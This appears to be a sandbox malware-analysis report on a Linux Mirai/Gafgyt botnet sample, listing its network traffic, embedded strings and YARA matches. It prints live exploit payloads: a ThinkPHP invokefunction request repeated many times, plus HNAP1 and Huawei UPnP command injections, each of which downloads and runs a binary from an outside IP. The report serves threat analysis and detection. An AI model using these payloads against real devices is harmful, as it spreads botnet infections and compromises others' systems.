                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficDNS traffic detected: DNS query: vector.mineheaven.org
                      Source: unknownHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: 1gx339YsKN.elfString found in binary or memory: http://15.235.203.214/bolonetwork.mips
                      Source: 1gx339YsKN.elfString found in binary or memory: http://15.235.203.214/bolonetwork.x86
                      Source: 1gx339YsKN.elfString found in binary or memory: http://purenetworks.com/HNAP1/
                      Source: 1gx339YsKN.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: 1gx339YsKN.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

                      System Summary

                      barindex
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_1e0c5ce0 Author: unknown
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1e0c5ce0 Author: unknown
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
                      Source: Process Memory Space: 1gx339YsKN.elf PID: 5540, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: Initial sampleString containing 'busybox' found: /bin/busybox
                      Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKbolonetwork.armbolonetwork.arm5bolonetwork.arm6bolonetwork.arm7bolonetwork.mipsbolonetwork.mpslbolonetwork.x86_64bolonetwork.sh4<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                      Source: Initial sampleString containing 'busybox' found: Content-Length: abcdefghijklmnopqrstuvwxyz/proc/%d/exe/tmp/%s%s%c/proc/self/cmdline/proc/%d/proc/self/proc/proc/%d/cmdlinenetstatwgetcurl/bin/busybox/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemdshellmnt/sys/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/anko-app/ankosample _8182T_1104/usr/libexec/openssh/sftp-serverabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ3f
                      Source: Initial samplePotential command found: GET / HTTP/1.1
                      Source: Initial samplePotential command found: GET /
                      Source: Initial samplePotential command found: GET /HEAD /POST /HTTP/1.1 404 Not FoundServer: ApacheContent-Length: %d
                      Source: Initial samplePotential command found: GET /index.php?s=/index/hink
                      Source: Initial samplePotential command found: GET /%s HTTP/1.0
                      Source: ELF static info symbol of initial sample.symtab present: no
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_1e0c5ce0 reference_sample = 5b1f95840caebf9721bf318126be27085ec08cf7881ec64a884211a934351c2d, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8e45538b59f9c9b8bc49661069044900c8199e487714c715c1b1f970fd528e3b, id = 1e0c5ce0-3b76-4da4-8bed-2e5036b6ce79, last_modified = 2021-09-16
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
